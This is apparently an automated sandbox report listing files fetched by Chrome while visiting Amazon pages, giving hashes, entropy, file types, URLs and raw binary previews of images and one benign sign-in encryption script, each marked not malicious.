                                                                                                                                                                                                                                                                SHA-256:47907C5361104BC1966AE2D3B9A66269E9C297A37D35D6387BAFC916B8B0C3A4
                                                                                                                                                                                                                                                                SHA-512:25CFA3A48C1BE02E28FE40273F5F982B96994021E076E76D1AC50A09AE8E583476B60C8D919184D7CC68059F42D11A8CDE648B8970D9FC3200B676955A29D779
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/617y0uaih6L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........J.."................................................................!1..AQr."3aq....#su...&4BRb...25.S..............................................!...."12QqAa.............?..t(SSZ...R/.wmP...9.W.[......+..w...2.M216......D+.^R;.n....&.......Rd.L.eo.@C.\x.z8...&%....&..7.Dc.S..~...X..H....o...{I4.=V..br.V9Q,..aH.......+....7dT.#.dV..n...v.F?.I.u<..h9......g.`..v.!...T..b..NK+.o..... ..e#.e8e#..L8...G6..W. .a$.>.5.oq'^.....cgz..^%w..xH..0...:.,..a.*y2.hG0..`..P.+Y.0.B.3....^8.Y.........r^....p.".._y.6.m-..[...Im.. <.F[.!UTqgb...<T.^.........hZYu..B.....r...... T<......$.0X;#\.1.R....7.d)\F..{...3.'...y...PX..7..u.e..j].zQ.mY.[jq.<.Rm.P ...e.Al.G.......#G5.N....8..8.....*.......+Z....r.g-i.d....%*jq.u...0..b.%..s$C...."...[..x..-.>1.(..6|.....*.I].1.....=...J.....(.;S...Gqur.A.;.2B.....Q.N*..D..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9661
                                                                                                                                                                                                                                                                Entropy (8bit):7.887871928522359
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:uprloevbbkPAFu36wlY+q7XDx4bFV8mS5IMJLCKENDH/mdoW0I:SrloebIYYqwlY+oXD2QT5hLCKnN
                                                                                                                                                                                                                                                                MD5:C62845F68C2A1EF072BCE0F592C0A32C
                                                                                                                                                                                                                                                                SHA1:9AA762576E32EE8132843CC02DAA90B7ECB97363
                                                                                                                                                                                                                                                                SHA-256:F1D78901324877ED11BCF1ED14B020FA33C8F7E733731E97A75F7381AF150CCD
                                                                                                                                                                                                                                                                SHA-512:A6329193D0E3F5F315DBAD69B8D4C95500DFD16287B1C08693F739BF104D455F4F0E9FFA41511C1E72ED266AEBF0A0ED3A9CE1DA055281AD6347EC7BC326E31C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71SFHwsXvbL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................X.............-|.T._........_o...A;S...b.c.|Q....|=..F8ng..............>f...:..>..8.j.%. WM.D*k.C^..#...e.f9}.......M.;......\W...............E.'.}...&[.!....{.........F..z.'\c1E..1.v..y....=../.>....t...........z|.....Y....W.m.P.Z...i..jF........k.eq......."..w..Z.s.W..A.@........1.N.....7;......j..F.3.*".;..?kD....)..N9........M[U..x=... ...............w...#....%.....v.vWB..z..i[.Q...kj_.U\..........{.m.E...q....=y....{.............G.|_....;..NS{........cj.z..Xj.FzE\~...~.Ur.,.e...F...\..7f...{)(.._u...='..y..........9..T}.............)h.-...6i...O....^..F...1.%N.K..-.....7zZr..aZ.V.c.=....3.r9.......x....+.9....r...".L..h.7(.-.....u=3.y<...;..z+.<..A.].>...#.......;.7...}.....m.Ed.%.Y....o..q.......<..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2126
                                                                                                                                                                                                                                                                Entropy (8bit):7.727551160854069
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rVDab2r5IGczX/BUktX8SzVwLc1qYgY6ssCecQOdj:Tyab2raXzZU2dBecxqbcQs
                                                                                                                                                                                                                                                                MD5:39D4307D1E3F7E1011831A12EAF630CF
                                                                                                                                                                                                                                                                SHA1:4C5D059985B30F4D92BE536FE827499D0B7C0455
                                                                                                                                                                                                                                                                SHA-256:75CBE731B4F76EC56A97BF842AD9961D459408B7A820BC2B08C36C5C1DCFBD7A
                                                                                                                                                                                                                                                                SHA-512:AFF0E1FB6804FECFBBE6BDFEDD8FB6823737445558A1ABA8E357610FEF017714278DCCAE93D77C6E9BA12322F3BA5C5CF212A7E03A5C3FC92D066486305C7AFF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........z.....................................................!1Aa.."Q..2q.r........$BRb.....................................................?....................f...]+........f.+.................WEc...Y.bw].P7...w&1..x(....s.{.u.....N.D:7P7.:..nl>.(#..c..1..^.........^i.eL.&*,...6E(x.X..cO......$.....k..w...Zj.un...i.w....=f8....e....w...-.,>.%..{...s..I.I<I]..rWHyt..j....f...r.^...m:.8o0:....k. K%L..L.7.o}......q.b..T..(..""." *..... (...Y.nfIe..d,..:<.......g..JA=.rI..E.(|L....@p.bt........Ap.4>#p_..._..I.O.C..j..o..uj[<.5.G.4w:. k.q+X,x."^.]...........c..[.....wW{8y...U...#..A(3L$..?....5.3..G..i.1.<...Ylq.gQ.B..<..3N..|.......O..N........^.=0G.G.......jO.."".....v..!....Q.]#....^=.%.*`..Eh.$...Mv.X._.....R..f.....jwD?.1.{.&5....o.q{'.w...%..v.7k....N.vY.P..z;........kF.2Tq.W..O...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13218
                                                                                                                                                                                                                                                                Entropy (8bit):7.864034228159954
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:E++Fig5KfN74L1XzqzZgJXZiWGqG2KxKne1YxBU7YlpWnFGes8T8squWESbljEi2:7+04xXVX8YrBUMbUFGes8osquaowQ5EY
                                                                                                                                                                                                                                                                MD5:EFFFF114D0586635AFBBA9DF43E7CB5B
                                                                                                                                                                                                                                                                SHA1:77B21281CCA6A50FB939E2D58D82A626A88E4CBA
                                                                                                                                                                                                                                                                SHA-256:CA262FCFBCE803D40BBA897B0DB44BA02454A6ADE29CB98279BDC5D1EF77558F
                                                                                                                                                                                                                                                                SHA-512:D3B4EE80987D0B8311652F7C9E3068157E351EFAC356FF3B2B0485C905296E07AE04D8327468CF95885D2278BCA9EBE6161D0E6A9C2B3DB0BAD29EA9B2269C8A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............$....8PLTEGpL.y!.y!.y!.z".y!..%.:.o<..z".{#....^.J....z .......y!....z!.y!.....z"......ossnrrQegJNNAKLIMM[^_JNNIMM....tP.........OSS..........GLMJNNBFFJNNJNNINN...JOP...JNN...~.....JNNIMM...IMM...................x..~.pss.q...........y!.{".z!...z".........z"..&......G..C...y!.y"..8.z!.y..:..9..9..._.L6.....}b.......htRNS.?.. .....o..........`...Q....>. ..............Kt............^..................w...H.f.................s....1.IDATx...E..0.CQS.a...s.Q.....hW...i.....B....5....;`...6......w.{.....:......x......5.x...J.R.f!..)...i.<.\$-..M.)...i.<T".8....5.x.4.NDB..u..#...6.B+V;+%.._......D.Ke....o.{E.1.<.M.G......4.......u..p...4'..p.....416$8q...)...B...B..C .R.K.~...G.=H..._.3......AS..o..8Bi....KW.s...Ei).~f...I..I.g......w.z.......i.k..,......h,......>.2.~....}iT..}*)..-......Os..S&..P{i..(8.Z....$.8....YJ...+.K/5......."...}:P...P{....g...4#.|.3v`..SHruI.PA..C~~.6..).Z].S*(..pDw.....q........D..ZY...,....\..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (391)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2073
                                                                                                                                                                                                                                                                Entropy (8bit):5.5217451089062894
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:uQtgok9mgoksITlvsduD3uD1uD1uDs+gEvW2oNo/OcXRsaRdOXduSYpSzJS:uQ+3f3lh0UDeDsDsD8EO3+/OciaRdYJe
                                                                                                                                                                                                                                                                MD5:07F3BBAE3312B76D3A76B274E03D3F0C
                                                                                                                                                                                                                                                                SHA1:2D85782448AD21736AA6093D3FC5D02C48A91591
                                                                                                                                                                                                                                                                SHA-256:C47691A714391803F4A58CB0400DB014EF031FA64EA282235BE2035299707EEB
                                                                                                                                                                                                                                                                SHA-512:C93FE5EAD1424F7D4632799DE34AD06A35E23763E28142E7A0A4337F430F0E43D3AC858B4B518945DF89E0CD0FA174462F12A594D5791BBDD120E4FD84418106
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(f) {. var haveAUI = typeof P !== 'undefined' && P.AUI_BUILD_DATE;. if (typeof SiegeCrypto !== 'undefined') {. if (haveAUI) {. P.now('siege-cse').register('siege-cse:profile:AuthenticationPortalSigninEU', function(lib) {. return f(lib || SiegeCrypto);. });. } else {. f(SiegeCrypto);. }. } else if (haveAUI) {. P.when('siege-cse').register('siege-cse:profile:AuthenticationPortalSigninEU', f);. } else {. var err = new Error('CSE library not loaded, and no AUI');. try {. ueLogError(err, {attribution: 'siege-cse:profile:AuthenticationPortalSigninEU', logLevel: 'WARN'});. } catch (e) {. throw err;. }. }.})(function(SiegeCrypto) {..SiegeCrypto.addProfile("AuthenticationPortalSigninEU", {. "password": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},. "passwordCheck": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},. "passwordNew": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6230
                                                                                                                                                                                                                                                                Entropy (8bit):7.540158814434573
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TBSnc5c596iAUHOsF6kPU+Y/PSOiqtd5CzGViOkhgaOkZ7BpTNMTTbj/ZM:Oc5ClusFtPU+Y/hrtdcNhekZ5MTLu
                                                                                                                                                                                                                                                                MD5:6129894957981525D61B4F90F6CF310A
                                                                                                                                                                                                                                                                SHA1:1BB3C735ECC0D9E681B8B6F19638E6B164F8502A
                                                                                                                                                                                                                                                                SHA-256:A8127B064C45B5F10B031F3985D5E13E12872C5D5F289D7731E38BA1960364B7
                                                                                                                                                                                                                                                                SHA-512:4F537B6593513277EE2DDFC4803258412174F22AD80D4E45A0F90E478961471BD022734B6364FAC7F7E5777D96AA77CB3B9CFE204071015C9EF267CD206BE8D0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31AGMSYB+OL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2.................................................................................................................................................................................................................................................................................................................S.....e..r....................>...,.....AAN.Y.+....].4....................<.w...pS.vx..5.1....................#.c.E....N...9.g...]d.k............................^.;....%..:.Q...g@.......89q.0......`..P....I..FV,....GW....r_N.{..s.vSq...... .......qK.eZ.......]"..o.v.X.9..}o.U`,..............1.....f4......1.o.c.....=...yh...kg.(.r~Zn1.|..B..A.O..J._.X............5.'.'Un.Z=..k..{Y...+s".f..E.x.{......3'..6...x...=.0.i..d....?Y......~5.:.....>..=qj.p..7.'.:.h9.;)).h*..Q..(.......7{l..jm..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4959
                                                                                                                                                                                                                                                                Entropy (8bit):7.773478023149434
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T/gGKvwoBIIXn6rlg6rL3kOtqiclyNxpE5zQp0bEe2gZHkG4vYgq1VCcCvWx:8ppu5PtIlyxpEFQp4EPoPRz4C
                                                                                                                                                                                                                                                                MD5:20D3F0A0256186A3929A2895C87836B8
                                                                                                                                                                                                                                                                SHA1:82B896373BD8B971516E0404E3DD99A6C31C85EA
                                                                                                                                                                                                                                                                SHA-256:6E3C66C3CE664D57A6C1301DA1AB7DC43E37D9D7D6FB0409D0148E46E5652D52
                                                                                                                                                                                                                                                                SHA-512:6ECE7AE1D0B23132249185E73999C4F1352DBE0201F3B95F9D1289E27274F8984B49F222B09296191BFEF638BDDBDC9BE62FEEF6BFE580ECFAD8EA95EB8C7294
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`........................p..I....58(k....u.8.^...A.gr..'](?.y...-~l........i..\]J....).Y.....}..FDr.sfZ..oY.......J..]..wp.a...-.w{.X.2W:.e~...u2g..7...G.r..u..........&.%,.<.n....|=....~|..c....o..V.B..=..+x...........B).../....5....]....?..L.z......Y...r............Ai...+.....r.3..n|F~2...>J...h.....3}...l.Z.+........._.B...ZCG\........#....r....rG.dS..VM......ez..%s......v.....J....O3..[}....=*~w..../..r.?dz.......r.k\F4.N..J...O.......... .......+.*.........2.......#....>....a.....[...l.k.a.................................../............................4..0.!13"#2$5AC`p.............Z..uwh....0...x.;.A."...w...D.. ...x.....kK..>j.n...../.%/..:c.. t.m./E.h...!..4P.......+..J..Ua_.%...^z....fdw..a...'..*.<...bH. .
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2939
                                                                                                                                                                                                                                                                Entropy (8bit):7.854205744631827
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6iGRXUU2QvrcpMbhjcyMU7B5i99JpnVFL5zdPB1Qnu9oGaWLTD6Ms+ZI:TqOEKjcCNcXO509J5d1Mw6P
                                                                                                                                                                                                                                                                MD5:4C56397C1B8592F275D65A88A46FD2DE
                                                                                                                                                                                                                                                                SHA1:F85F68FF270455D4234E7465DC8175D04CCE1DFF
                                                                                                                                                                                                                                                                SHA-256:6B09C0115CD20D332D985AF2F72A6D29E0EA95C5D3E5BF2AC033CEB3D0C8A768
                                                                                                                                                                                                                                                                SHA-512:5A826D801ACCF134633F1BC04FF7FB62E4AD4A26B08BC8F3EF95560E18F0356922764216D9E7BB52EF82A8D768584D66EAE5EB8212B7CD09BDDCBA6709B14D45
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1.."....#2AQRt......$35BESqr.....DTUa..%CF..cd...............................................!Qa...12"Rb.............?..h....................a.AA.~+/..b.Z_.....U......qi|..PPEf..+*x.."..=.e`.h.;.|&.lW.....................+S.$.i...AT...h..}.U.N-....u?.G....^.j..5RAS.VT|;5..+.].,....!..2}+....;.$..F..o|.ncsy...w..:Lj.[U.c.....1[...o$N..x..y..)..)..kjL.n{^...v..EL.;.]...]..\.. .o. ...........y...X..<O`$.x.+......Tb.=;"dY.R...,.&.T.+.0..........q.FJ..@.6..t...........6..gt...-.Y3...........7.Q...t....9.Om.b$..{H5P..xh.Dm..KUZk.s........nu.{....Nq'`#I....0..|.t.gW.)Fl....i.....D..pzL}%....9.3_.^.Y.^Y.42n.g....u....1...Y.._...jN..>.._j..O.slWke...)..DO,."...d.........*...........Nd.....m....1.V.)m..i.tyJ...v..{.<.{..2.o.3Y..g....:z...t...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5352
                                                                                                                                                                                                                                                                Entropy (8bit):7.918266697438741
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TW4gYdyTJBP0XZOGszoFNqIPFNwcZUmbzZByADqP7lVEUP5rSlT:jdy9BP0XAzoFNqIPQDkNUxlVEUP5elT
                                                                                                                                                                                                                                                                MD5:82389E8686D983207D46451283CF3F9B
                                                                                                                                                                                                                                                                SHA1:E021F9A68A30A36A8204C7F7A0A53ADB96D9B241
                                                                                                                                                                                                                                                                SHA-256:BEBAE55CE6F0E9A54E09B7D03F3544C721F41C5EC04AFA7460C690DD0DA0707F
                                                                                                                                                                                                                                                                SHA-512:FB86C446360432B00D73E8B2AA8E9460B835197AA19598F5A5934D20F7C52E8A13D53A633F34C2BA2F5C0F5CDC6B63FC79C3BB4C45DB565BFD559E92E6700365
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1.."AQ#23aqr..$Cbs..BRS........&4c...%tD................................................1.!A..............?..t.(..(..(..(..(..(..(..t..I.*.$.....0PI8.......K..4.-.8...4U.4.U.!.,.`..l/...X,2b...\...\.&G<.*}.....2.u.L.q''|.n!..}...:>.t.!.t9..j....i...U.../.e.O.R..R......;?._...Q.e.r...+K........[.I...].@.<U.t.R..R..R..R..W......a[....0.<Q...&.q}........*.<...kp..;..<)/....[..V&..R,.kX.5K.r...v.<.......k7"9.B..P~..~.Yh.Y.(...9..i:...B.4=\..$H.....-..6.G.o.c....~.j./...v..V..e2!`....<2.c....P)JP)J.zT.-Q...!..`pTw..a.{~M........K...$...g.q.*.*.E.Y[...w.u......X...<...#.$.$....2..nMf.I....k;..F....F9..`.{f...|..Vw(A......Pd)JP)JP/oa..[..$q)fs..UW.}M6.4...s..{....|....J. .[..mP..DD.xX.....3x...c....>..vL..G..`............7D............C.'.y
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11142
                                                                                                                                                                                                                                                                Entropy (8bit):7.964527129113803
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:KOHVfClSS2Av/1yDCwneeNpNr76D3+yPhCeQq+Bv2:qlv2lCEeeDqOKhsB+
                                                                                                                                                                                                                                                                MD5:7F8DCE6CF8C51F9E46BCCFF5844CFCCD
                                                                                                                                                                                                                                                                SHA1:E0634302181D67D1D580B2F676FAD4D4416DB294
                                                                                                                                                                                                                                                                SHA-256:E94623144A357F2253B364DD63EE4C5311BCAA8B5AFEC852A4E0DDF4B3F875F1
                                                                                                                                                                                                                                                                SHA-512:7A67C8012FC538EA47FF129EB33466411ED4FC013365253BDF9A8C80C737F776610510133BF0AFBDC2D712221B75232F52C61395EE3B7F6EE856F5244B80BD69
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!.1"A..#2Qa.RTq....BU.346r...$%t....S...............................................!.1..Ra.."2AQ.#.q..............?..th.i|.4h....u$.##.gB.qo...Nq...?$...L.. .a8d.G-^.V....[L[V..z3\..D.....g......1.x8q.cSV....../...]2(.....F............U.m..O+.BY5......a.;..a}...'.`.s.&L...t...C{*.8.....g>4..#V.......j.=.....0k.. "..KS.6..v.+D....U...1Y g.[.8.....S.~.1......s\....#G1.s.i.D.S...F.E...z.........F...Q*6.Y..z.}..m...."...9...t....y....8...`. .k.\]H+u7K.R}..w ...N.6....'.r.r.pq.wVe[...r..p..2.B4h.RF..4!{.i"..Ae.......:nn...i..3......%..........E.:.]O..].4\p...@.TX-.p.......@...D.x...x.k..;....e.\...w.....zq.....o...o..MVM.....R./ND.I.3..@G.au..$.w]^H..m...xg..%....dd!..c....}..A......8+=..C.\pTw........y........Rv.j8.H...._-.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6120
                                                                                                                                                                                                                                                                Entropy (8bit):7.794422566903307
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TTi0lJR+9CosLaadfhF/RSI8E2T2JopVlLW1rdoKCUQCOzfPnyU9hA:q0lz+9CPaaNhNj8Ewp21hUUzMf/NA
                                                                                                                                                                                                                                                                MD5:C0AD26F31EB890982EDA60CBC1C953B3
                                                                                                                                                                                                                                                                SHA1:9FFD025E8695FCD2059B9003BFD23AF6F268675D
                                                                                                                                                                                                                                                                SHA-256:F87FEF58784E922560B8AE4129EE1ED01D6531CFAF90CE517AB7AFE573F5700E
                                                                                                                                                                                                                                                                SHA-512:069126C2B87E0F5968D3AC02DFD3CF30086B9A277CB59EBC911075E56F4BC406783C0A908BCEDB7D6FD5166B3DE28B63825526963CDE76BBD6F27D3A46B81AEA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/51NCX6DSjPL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........2.........................................................................../...8.#.._..}Wc.[.}^_/._.8.B..\z.[...................6.qu...6.i.z........<n..M..g...R...u....N....3!...................V.r...V..\ma53.....j..k..MG.gQe....|..wY................~...e\..rK8..Y$....l...,..[,..5T+.....v._[|......w.'..{.................Z.,K...VK.\.....5..s...g.]...v..[.....[.v>o.~:.kNZ..[g.0.................U.b)..g.F..........wq..~...s...+...r.n....u>.=...j.........x....j.8f...&G...<...d'..u....go.......U..Uic..\.-u{:....u|oe.n...........y..r.Y/W......`.f.f..........j..(J$d.........?...q................kWgW.H..s:d.....]*se..l......_3SbSv.r..m..k'^rF.#/;.r.W......u.o ........=..7..\....l..e..-..d..,G.ng........+..........u..K......\.........9..j...^.=...;......f....So..5......"..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5056
                                                                                                                                                                                                                                                                Entropy (8bit):7.8959912195090745
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TJqaa46ziwZHeNZvgQDw15ncVnOvH2a8CD7g8jrPmdxV7G8eNgC:QPzigeNRgQ4eBa8Cn/PmdxV7G8eNgC
                                                                                                                                                                                                                                                                MD5:A232DE2D81EE92B776CCDFE99573C067
                                                                                                                                                                                                                                                                SHA1:7163EE5F14BCE17BF60010976F96FCDA1074554D
                                                                                                                                                                                                                                                                SHA-256:AD7A92BF92AB4C6CFCCEB02ACC48369058249E0F23155B7B4AB6D6D329191275
                                                                                                                                                                                                                                                                SHA-512:3C30E0A1EFA86E44D9B7010347C7B4495277D7EE692DEFAE460EA7755FAB3ACFA1215281F3D433B43EEA9BD5C11C8D303AD5CD33F6738061849C830ACC725EDB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1AQ.."aq.2R..#r....$BS...3....&Tst...............................................!1....2A."#q.Q..............?..hB......!./.w8-p>y...'...+....D.......~.....-a..rz...y{P..t..o...wjtsN.*.t...BA.'..y(...1.-<.....8.G"0..g.O....j.....k........|.....d...*...Qq..?...q.w=.G9.%.q.q9$.....RV6....>....2v....|.w..B...M.WK4.....5....v....w.i........./7.J..F...NL.d..7..{.".......x.PV..@2...p.j..u.L.:..........5ck.~.Z.<`....!.Q=.fcC2.F:.k..mV..WRQ.....xi..e......>.E.^.ys..\I'.'yY..u.K.l....]q.QN_...e;H}MS(.A..n.f.k.G.D.ES....=..i.#q..l....UN......z.3..x...S...A.B...!...B.B.... .!...B.B...%.2MAw..3....*mL...mU;uK.9`.....B..........z1.Mp..G.-.q.....$......v.......?.y............Pw.F.^YO.n|N..._MV<en....#+d..<Z!.%.S 6......9..r<.8.'.U
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):74985
                                                                                                                                                                                                                                                                Entropy (8bit):7.103595381590611
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:0T2KrYKXlzzBPO14IXApH/vx8Ltta1Ecpysx+Ax1R4g:01r/Xl/I54nx8Lj2EcIsxbIg
                                                                                                                                                                                                                                                                MD5:17CE59BA5D2A3EBCCEA027FBEF6870F2
                                                                                                                                                                                                                                                                SHA1:FBAB3C3818C6FF0362D22C43CAEC9EBF52E53D7D
                                                                                                                                                                                                                                                                SHA-256:DF86C4DB91C36689F4BFB3881BF2F0E39741E3CB73C343C81078348D348C5FE5
                                                                                                                                                                                                                                                                SHA-512:4B9D3D900005933426289F2D07804C5BC78AF6F8CAEEBF3020FF12DAA9524FFFCA49AA2735641B1BCC3928D84E8DD941DE91D7BC8FE4089FC3A7F2D6719BBCB7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61wsqPl4LBL._SX3000_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..............Exif..II*...............4IJP........4?jumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:ed07aaef-753d-4a77-9e68-e0db0e6e2ca8.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Kdnamenjumbf manifestcalgfsha256dhashX .l*....Q7.o.K...l].c.F..>..l1o.cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:7EE25733472B11EF8FE8FE57D3F77758oclaim_generatorx7Adobe_Photoshop/25.12.0 adobe_c2pa/0.9.3 c2pa-rs/0.31.0tclaim_generator_info..dnameoAdobe Photoshopgversiong25.12.0.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX J
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2070
